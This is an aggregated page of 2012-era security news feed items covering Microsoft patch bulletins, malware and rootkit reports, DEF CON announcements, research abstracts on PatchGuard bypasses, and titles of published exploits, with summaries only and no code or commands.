http://securityvulns.com/informer/rss.asp?l=EN Page can track any mouse movements, even behind the page. Applications: Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7 (12.12.2012)

==> Microsoft Internet Explorer 7 memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on redirection to data: uri containing some tags. Applications: Windows XP, Windows 2003 Server, Windows Vista (10.12.2012)

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects. Papers and Posts ------------ * FireStarter: Agile Development and Security * Comments on Microsoft Simplified SDL * Rock Beats Scissors, and People Beat Process * FireStarter: Secure Development Lifecycle – You’re Doing It Wrong * Structured Security Program, Meet Agile Process * FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure * Are Secure Web Apps Possible? * Clickjacking Details, Analysis, and Advice Presentations --------- Security + Agile = FAIL Podcasts, Webcasts, and Multimedia
We do not currently have multimedia for this topic. Vendors --- We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits. * Cigital * HP (SpiDynamics, Fortify) * IBM (Ounce) * Veracode * WhiteHat Security

==> Encryption

http://securosis.com/feeds/research Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution. 2. Your Simple Guide to Endpoint Encryption. 3. Post on the Three Laws of Data Encryption. 4. Format and Datatype Preserving Encryption 5. Post on When to Layer Encryption. 6. Application vs. Database Encryption. 7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats. 8. The Data Security Lifecycle covers encryption during the movement and storage of data. General Coverage ------------ 1. Tokenization Will Become the Dominant Payment Transaction Architecture 2. Visa’s Data Field Encryption 3. Boaz Nails It- The Encryption Dilemma 4. “PIN Crackers” and Data Security, looking at attacks on encryption. 5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security. 6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission. 7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection. Presentations --------- * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * This presentation is on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you if should you should start looking for tools. Please email info@securosis.com if you have any additions or corrections.
Enterprise/General Encryption Providers * Certicom. * CheckPoint. * Entrust. * GuardianEdge. * IBM. * nuBridges. * Prime Factors Inc. * RSA. * SafeNet. * Sophos (Utimaco). * Symantec (PGP). * Thales (nCipher) * TruCrypt. * Venafi. * Voltage. * Vormetric. * WinMagic. Endpoint Encryption Vendors * beCrypt. * Credant. * DESLock. * McAfee (SafeBoot). * Microsoft (BitLocker). * Namo. * Secude. * Secuware. Database Encryption Vendors * IBM. * NetLib. * Oracle. * Relational Wizards. * RSA (Valyd). * SafeNet (Ingrian). * Sybase. * Thales (nCipher). * Voltage. * Vormetric. Key Management, Certificate and other tools * Entrust. * Prime Factors Inc. * RSA * Symantec (Verisign). * Thales

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this week need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks. Papers and Posts ------------ * Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete. * Securing the Cloud with Virtual Private Storage. * How The Cloud Destroys Everything I Love about Web Application Security. Presentations --------- * Understanding Cloud Security in 30 Minutes or Less! Podcasts, Webcasts and Multimedia
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too.

==> More DEF CON 19 News

https://www.defcon.org/defconrss.xml Things are starting to heat up for DEF CON 19! Here are a few of the recent developments: DEF CON Scavenger Hunt has SPONSORS!! ThinkGeek.com and evilmadscientist.com are confirmed sponsors of the scavenger hunt, they will be offering up prizes and special offers. They won't announce specific prizes until at Def con but good news is we know that Think Geek will be offering a discount code, usable for ordering off their website during the convention, limited time offer! The coupon code for ThinkGeek DEF CON attendees will be made available at the Scavenger Hunt table in the contest area and will be announced via our twitter feeds @_Defcon_ and @defconscavhunt. Here is a throwback to the past! Check out this Scavenger hunt list from 14yrs ago! We hope you enjoy a little nostalgia from DEF CON 5 courtesy of Mike Schrenk! Skytalks CFP is Open! From the DEF CON Forums: TLDR: Who: You What: Skytalks IV CFP When: Now - CFP Closes 23:59:59 MDT (UTC-06) 31 May 2011 Why: Because you've got the warez to share Where: dcskytalks@gmail.com - WE RESERVE THE RIGHT TO POINT AND LAUGH IF WE CAN'T READ YOUR bleep IN A TEXT EDITOR. THIS MEANS YOU, MICROSOFT WORD USERS. Updates: http://is.gd/5Y8eyM Back by popular demand, Skytalks returns for its fourth year of technical prowess, side-track talks, and semi-coherent rants by some of the legends of the community. Never mind that we aren't actually IN a skybox this year, we'll still fill it to capacity, have lines running down the hallways for three talks in advance, and we'll recapture that original Defcon spirit and party like it's 1992. (Read on) You can track the movements of Skytalks on Facebook and Twitter as well: Facebook: http://is.gd/0d8skZ Twitter: @dcskytalks DC101 Site You can keep up on what's happening with DEF CON 101 by checking out the the new site at http://defcon.stotan.org/dc101/ DEF CON 19 Vendor Area! The vendor area at DEF CON 19 is growing by 1000 sq. ft. this year, so all of your favorite vendors will be back and maybe a few new ones! If you are interested in becoming a Vendor at DEF CON, Roamer has posted the updated Vendor FAQ at: http://defcon.hackingyour.net/vendor-FAQ.html As always, you can keep up on all of the latest DEF CON 19 news at https://www.defcon.org, the DEF CON RSS Feed, The DEF CON Twitter, or on the DEF CON Facebook Page!

==> Todd Moore, Treasure hunter contestant, spoke at DEFCON 12 on "Cracking Net2Phone"

https://www.defcon.org/defconrss.xml Since Todd has been announced as a participant on NBC's new show "Treasure Hunters" we have had more than enough curious folks interested in his presentation. We will be watching him on the new show when it airs, in the meantime you can watch him now on his Defcon 12:"Cracking Net2Phone" Presentation. Do you think using Internet Telephony is more secure than a regular phone? Think again! Internet Telephony is becoming more common and those that think it is safer from wiretaps than regular phone communications are wrong. This presentation will demonstrate how to decrypt Net2Phone's dialed phone numbers, and playback fully reconstructed audio conversations from network packet captures. Included will be a demonstration of NetWitness 5.0's VOIP playback capability. Todd Moore is the product manager of NetWitness, a commercially available cyber-forensics tool. Moore's extensive knowledge of Internet technologies, network security, and software development helped make NetWitness well-known for providing powerful insight into network traffic. Moore has over ten years of professional experience in the field of network security and has extensive experience developing commercial software applications. He has a bachelor in Computer Science from Old Dominion University and is a Microsoft Certified Solution Developer (MCSD). Moore started with CTX Corporation in 1996 securing global intranets and designing network security software to help audit and analyze network traffic. He joined Forensics Explorers, a Division of ManTech ISandT, as Director of Software Development in 1999 and later became the NetWitness Product Manager. Moore teaches classes on designing quality software and has made numerous television appearances presenting the latest in technology trends. He has two patent pending inventions in the field of cyber-forensics. Moore resides in the greater Washington, D.C. area.

==> AMD video drivers prevent the use of the most secure setting for Microsoft's Exploit Mitigation Experience Toolkit (EMET)

http://www.cert.org/blogs/vuls/rss.xml Microsoft EMET is an effective way of preventing many vulnerabilities from being exploited; however, systems that use AMD or ATI video drivers do not support the feature that provides the highest amount of protection.

==> CERT Failure Observation Engine 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hello, this is David Warren from the CERT Vulnerability Analysis team. In May 2010, CERT released the Basic Fuzzing Framework, a Linux-based file fuzzer. We released BFF with the intent to increase awareness and adoption of automated, negative software testing. An often-requested feature is that BFF support the Microsoft Windows platform. To this end, we have worked to create a Windows analog to the BFF: the Failure Observation Engine (FOE). Through our internal testing, we've been able to help identify, coordinate, and fix exploitable vulnerabilities in Adobe, Microsoft, Google, Oracle, Autonomy, and Apple software, as well as many others. Our office shootout post is a good example of this testing.

==> Necurs Rootkit Spreading Quickly, Microsoft Warns

http://www.darkreading.com/rss/all.xml Necurs found on more than 83,000 machines; Microsoft report calls rootkit a "prevalent threat"

==> 'Project Mayhem' Hacks Accounting Software

http://www.darkreading.com/rss/all.xml No exploit required for defrauding Microsoft and other accounting systems, researchers at Black Hat Abu Dhabi reveal

==> Microsoft Releases Critical IE, Word Fixes on Year's Final Patch Tuesday

http://www.eweek.com/rss-feeds-45.xml Five of the seven bulletins issued this month are rated "critical," Microsoft's most severe rating.

==> Microsoft Patch Tuesday Ensnares Windows RT Users

http://www.eweek.com/rss-feeds-45.xml Now that Microsoft's ARM-based Surface tablets are on the market, users will have to get accustomed to the monthly routine of Patch Tuesday.

==> Microsoft Can Retain Control of Zeus Botnet Under Federal Court Order

http://www.eweek.com/rss-feeds-45.xml A federal court grants Microsoft permission to keep two major Zeus banking fraud botnets down for the next two years to allow more time to clean up trojan-infected computers.

==> Windows Phone 8 gets its first update

http://www.hackinthebox.org/backend.php http://cdn.wpcentral.com/sites/wpcentral.com/files/styles/large/public/field/image/2012/12/FIrst%20OTA%20Update%20SMS%20Rej.jpg So, last night, Windows Phone 8 got its first update - specifically for the HTC 8X. In this day and age, where iOS is the gold standard and shows the industry how it ought to be done, and Android is the exact opposite, Windows Phone 7 was a bit of an in-between - every phone got every update, but the staggered rollout was slow and frustrating, often due to carrier meddling. How will Windows Phone 8 fare? Tags: MicrosoftWP8

==> In bringing Office to iOS, Microsoft is playing a dangerous game

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/12/office-ipad-640x496.jpg It's still not official, but the evidence that Microsoft is bringing Office to the iPad and iPhone is growing in abundance. At this point, it seems to be an inevitability that Redmond will release Office apps for iOS in some form in early 2013, with Android apps following soon after. Tags: MicrosoftOfficeiOS

==> Cached Windows passwords sound risky -- but aren't

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/bwa32/6607434907/in/set-72157628651915739 I deal with a lot of customers who area worried about Windows password attacks. These days, the biggest fear is of pass-the-hash attacks, a topic I've written about many times in the past couple of years. Often, when customers voice concern about pass-the-hash attacks, they ask me about cached log-ons in Windows. They've heard about the vulnerability and have read one or more whitepapers about it. Even Microsoft recommends disabling cached log-ons. In fact, cached Windows log-ons aren't a big risk at all. I'll tell you why in a minute, but first, let's review the basics. Tags: SecurityWindowsMicrosoft

==> Engineer Shows How To Pirate Windows 8 Metro Apps, Bypass In-app Purchases

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Windows_8 This article is a follow-up to my previous 2011 article on Reverse Engineering and Modifying Windows 8 apps. In this article well see how to use innate Windows 8 security attack vectors in such a way that could compromise Windows 8 games revenue stream. Well review real-world examples for all Win8 programming languages and frameworks. Tags: SecuritySoftware-ProgrammingWindows 8Microsoft

==> Microsoft Defends Hiring Foreign Workers

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft says it has 34% more open engineering positions than this time last year, and can't fill them all domestically.

==> Valley View: Windows Phone 8 Up Close

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Our most recent episode of Valley View took a deeper look at Windows Phone 8 with Microsoft's Greg Sullivan and checked out some intriguing startups. See all the highlights.

==> Microsoft Warns Necurs Rootkit Spreading Quickly

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Necurs found on more than 83,000 machines; Microsoft report calls rootkit a "prevalent threat." Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Microsoft tackles click-fraud in online advertising

http://www.infosecurity-magazine.com/rss/news/ Microsoft is teaming up malware researchers with its online advertising fraud experts in order to tackle a rising tide of online click-fraud.

==> Extreme full-disclosure hijacks hundreds of Pakistani websites

http://www.infosecurity-magazine.com/rss/news/ News broke on Saturday that Google Pakistan had been hacked. In fact, it was just one of more than 280 Pakistan websites including Microsoft, HP, HSBC, Apple, PayPal and other major companies that had their DNS hijacked to point to the hackers own domain.

==> Critical Updates for Flash Player, Microsoft Windows

http://www.krebsonsecurity.com/feed/ Adobe and Microsoft have each released security updates to fix critical security flaws in their software. Microsoft issued seven update bundles to fix at least 10 vulnerabilities in Windows and other software. Separately, Adobe pushed out a fix for its Flash Player and AIR software that address at least three critical vulnerabilities in these programs.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> MS12-083 - Important : Vulnerability in IP-HTTPS Component Could Allow Security Feature Bypass (2765809) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-082 - Important : Vulnerability in DirectPlay Could Allow Remote Code Execution (2770660) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-081 - Critical : Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2758857) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-080 - Critical : Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2784126) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-079 - Critical : Vulnerability in Microsoft Word Could Allow Remote Code Execution (2780642) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-078 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2783534) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-077 - Critical : Cumulative Security Update for Internet Explorer (2761465) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for December 2012 - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 5.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-060 - Critical : Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-059 - Important : Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2733918) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for August 2012 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-050 - Important : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 4.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for July 2012 - Version: 5.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-073 - Moderate : Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure (2733829) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-058 - Critical : Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358) - Version: 2.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-074 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2745030) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-072 - Critical : Vulnerabilities in Windows Shell Could Allow Remote Code Execution (2727528) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for November 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-076 - Important : Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2720184) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-075 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2761226) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-071 - Critical : Cumulative Security Update for Internet Explorer (2761451) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2749655): Compatibility Issues Affecting Signed Microsoft Binaries - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-062 - Important : Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-046 - Important : Vulnerability in Visual Basic for Applications Could Allow Remote Code Execution (2707960) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2269637): Insecure Library Loading Could Allow Remote Code Execution - Version: 18.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-034 - Critical : Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578) - Version: 1.5

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-066 - Important : Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege (2741517) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for October 2012 - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-055 - Important : Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2731847) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-054 - Critical : Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution (2733594) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-053 - Critical : Vulnerability in Remote Desktop Could Allow Remote Code Execution (2723135) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-070 - Important : Vulnerability in SQL Server Could Allow Elevation of Privilege (2754849) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-069 - Important : Vulnerability in Kerberos Could Allow Denial of Service (2743555) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-068 - Important : Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2724197) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-067 - Important : Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2742321) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-065 - Important : Vulnerability in Microsoft Works Could Allow Remote Code Execution (2754670) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-064 - Critical : Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2742319) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2661254): Update For Minimum Certificate Key Length - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2737111): Vulnerabilities in Microsoft Exchange and FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-035 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2693777) - Version: 2.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-061 - Important : Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-063 - Critical : Cumulative Security Update for Internet Explorer (2744842) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2757760): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for September 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2736233): Update Rollup for ActiveX Kill Bits - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-045 - Critical : Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution (2698365) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2728973): Unauthorized Digital Certificates Could Allow Spoofing - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2743314): Unencapsulated MS-CHAP v2 Authentication Could Allow Information Disclosure - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

http://www.offensivecomputing.net/?q=node/feed Dear like-mindeds, we (CERT.at, the Austrian National Computer Emergency Response Team) just released our latest paper which addresses an issue with Microsoft Windows 64-bit that has high potential to affect the IT-Security community. Especially those dealing with malware analysis and accordingly investigations. It's even possible that some of us already are or were affected but just didn't notice. The goal of my paper is to raise the IT-Security community's awareness regarding this issue. In short: this issue - I call it the "WOW-Effect" - is a so to say unintentionally implication of Microsoft's WOW64 technology and the according redirection functionality. You can find the paper on our website. If you have any questions regarding the "WOW-Effect" or would like to give me some feedback feel free to contact me via wojner_at_cert.at. Here's the link to the paper: http://cert.at/downloads/papers/wow_effect_en.html Enjoy reading! Cheers, Christian Wojner CERT.at

==> PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3

http://www.uninformed.org/uninformed.rss Since the publication of previous bypass or circumvention techniques for Kernel Patch Protection (otherwise known as ``PatchGuard''), Microsoft has continued to refine their patch protection system in an attempt to foil known bypass mechanisms. With the release of Windows Server 2008 Beta 3, and later a full-blown distribution of PatchGuard to Windows Vista / Windows Server 2003 via Windows Update, Microsoft has introduced the next generation of PatchGuard to the general public (``PatchGuard 3''). As with previous updates to PatchGuard, version three represents a set of incremental changes that are designed to address perceived weaknesses and known bypass vectors in earlier versions. Additionally, PatchGuard 3 expands the set of kernel variables that are protected from unauthorized modification, eliminating several mechanisms that might be used to circumvent PatchGuard while co-existing (as opposed to disabling) it. This article describes some of the changes that have been made in PatchGuard 3. This article also proposes several new techniques that can be used to circumvent PatchGuard's defenses. Countermeasures for these techniques are also discussed.

==> Getting out of Jail: Escaping Internet Explorer Protected Mode

http://www.uninformed.org/uninformed.rss With the introduction of Windows Vista, Microsoft has added a new form of mandatory access control to the core operating system. Internally known as "integrity levels", this new addition to the security manager allows security controls to be placed on a per-process basis. This is different from the traditional model of per-user security controls used in all prior versions of Windows NT. In this manner, integrity levels are essentially a bolt-on to the existing Windows NT security architecture. While the idea is theoretically sound, there does exist a great possibility for implementation errors with respect to how integrity levels work in practice. Integrity levels are the core of Internet Explorer Protected Mode, a new "low-rights" mode where Internet Explorer runs without permission to modify most files or registry keys. This places both Internet Explorer and integrity levels as a whole at the forefront of the computer security battle with respect to Windows Vista.

==> Subverting PatchGuard Version 2

http://www.uninformed.org/uninformed.rss Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely.

==> Power to the People and the Coming AppSec Revolution

http://www.veracode.com/blog/?feed=rss2 When the revolution comes, the first up against the firewall will be your business partners along with every other third-party that provides you with software. It used to be that you could call for more secure software from individual vendors and Microsoft heeded that call, for example with its push for trustworthy computing, starting in 2002 but today were more dependent on software than ever, and more interconnected than ever; we rise and fall by the security of our associates.

==> Possible Root Compromise of Greatandhra.com

http://blog.scansafe.com/journal/rss.xml A new attack emanating from the malware domain v3p2.com may be linked to a possible (alleged) root compromise of greatandhra.com, a news and media site with a worldwide Alexa rating of 2339. The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (CVE-2010-0806 / MS10-018). Successful exploit leads to the silent installation of a data theft trojan delivered from n9uo.com. Both attack domains - v3p2.com and n9uo.com - were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website. Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained. First encounters resulting from these attack began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.

==> Happy pack#1. I know what you installed last summer

http://blog.wintercore.com/?feed=rss2 It's really frustrating not to know what applications, patches, hotfixes (virtually any file)...are installed on the system where you are performing a penetration test, isn't it? I have decided to put for sell, to trusted sources only, a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain [...]

==> Former Windows Vista hacker now hardening OS X, iOS at Apple

http://feeds.arstechnica.com/arstechnica/security?format=xml "UNIX head" Kristin Paget now works for Apple's Core OS Security team.

==> Google, Microsoft, PayPal, other Romanian sites hijacked by DNS hackers

http://feeds.arstechnica.com/arstechnica/security?format=xml Incident is one of several DNS hacks to strike in recent weeks.

==> Multipurpose Necurs Trojan infects over 83,000 computers

http://feeds.feedburner.com/HelpNetSecurity The polivalent Necurs malware family has been wreaking havoc in November by infecting over 83,000 unique computers - and that are only the ones detected by Microsoft's solutions! The Necurs Trojan ...

==> Microsoft IE execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft IE 7, 8, 9

==> Microsoft IE 8 execCommand Use-After-Free Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft IE 8

==> Microsoft Windows RDP PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows XP, 2003, Vista, 7, 2008

==> Microsoft Windows RDP Remote Code Execution PoC (CVE-2012-0002)

http://rss.feedsportal.com/c/32479/f/477548/index.rss : Microsoft Windows XP, 2003, Vista, 7, 2008

==> Microsoft December 2012 Black Tuesday Update - Overview, (Tue, Dec 11th)

